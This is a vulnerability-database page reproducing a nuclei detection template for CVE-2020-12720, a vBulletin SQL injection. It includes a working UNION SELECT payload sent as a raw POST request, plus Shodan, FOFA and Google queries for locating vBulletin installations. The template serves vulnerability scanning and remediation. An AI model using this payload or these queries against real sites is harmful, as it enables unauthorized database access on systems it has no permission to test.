Lucene search
K

vBulletin SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

vBulletin SQL Injection allows unauthorized access and data leakag

Related
Refs
Code
id: CVE-2020-12720

info:
  name: vBulletin SQL Injection
  author: pdteam
  severity: critical
  description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin.
  reference:
    - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12720
    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
    - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html
    - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12720
    cwe-id: CWE-306
    epss-score: 0.88948
    epss-percentile: 0.99762
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    shodan-query:
      - http.title:"powered by vbulletin"
      - http.html:"powered by vbulletin"
      - http.component:"vbulletin"
      - cpe:"cpe:2.3:a:vbulletin:vbulletin"
    fofa-query:
      - body="powered by vbulletin"
      - title="powered by vbulletin"
    google-query:
      - intext:"powered by vbulletin"
      - intitle:"powered by vbulletin"
  tags: cve2020,cve,vbulletin,sqli,packetstorm,vkev,vuln

http:
  - raw:
      - |
        POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-

    matchers:
      - type: word
        words:
          - "vbulletinrce"
# digest: 490a00463044022029babb63288e0ba164253e8651663fdfbd7b99d17538988c8d379c769349cf58022075a50f3495f0b4106560557b411179ff239cc283f64574e1a4f9b8e046a20bcd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.88948
43